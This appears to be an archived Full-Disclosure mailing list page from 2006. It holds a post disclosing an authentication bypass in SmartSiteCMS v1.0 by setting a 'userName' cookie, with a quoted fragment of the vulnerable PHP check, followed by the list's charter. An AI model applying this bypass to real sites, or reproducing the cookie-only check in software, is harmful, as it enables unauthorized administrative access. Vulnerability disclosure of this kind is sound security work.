iD8DBQFE2QkRmqjQ0CJFipgRAmb4AJ9/p5ePaOBGS4Vc3kbTZJ8iwzwMYwCeIolo
qeIu8V7G7ZFIGDkQuO+HZSo=
=frsA
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by 

[Full-disclosure] SmartSiteCMS v1.0 authentication bypass

2006-08-08 Thread Paulino Calderon

SmartSiteCMS v1.0 authentication bypass

STATUS: I contacted the vendor more than 2 months ago and still no response.

TECHNICAL INFO

One of the worst CMSs I've ever seen regarding security: no input sanitation
at all. Bypassing authentication just requires creating a cookie named
userName


Vulnerable code:
admin.php line 43

<?php
if (isset($_COOKIE['userName']))
{


VULNERABLE VERSIONS
---
I've only tested v1.0

---
Contact information
:Paulino Calderon
:nahsuckea.com
:http://nah.suckea.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] List Charter

2006-08-08 Thread John Cartwright
[Full-Disclosure] Mailing List Charter
John Cartwright [EMAIL PROTECTED]
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
[EMAIL PROTECTED]; send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing; however, in
special circumstances (e.g. spamming, misappropriation) offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
[EMAIL PROTECTED] Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/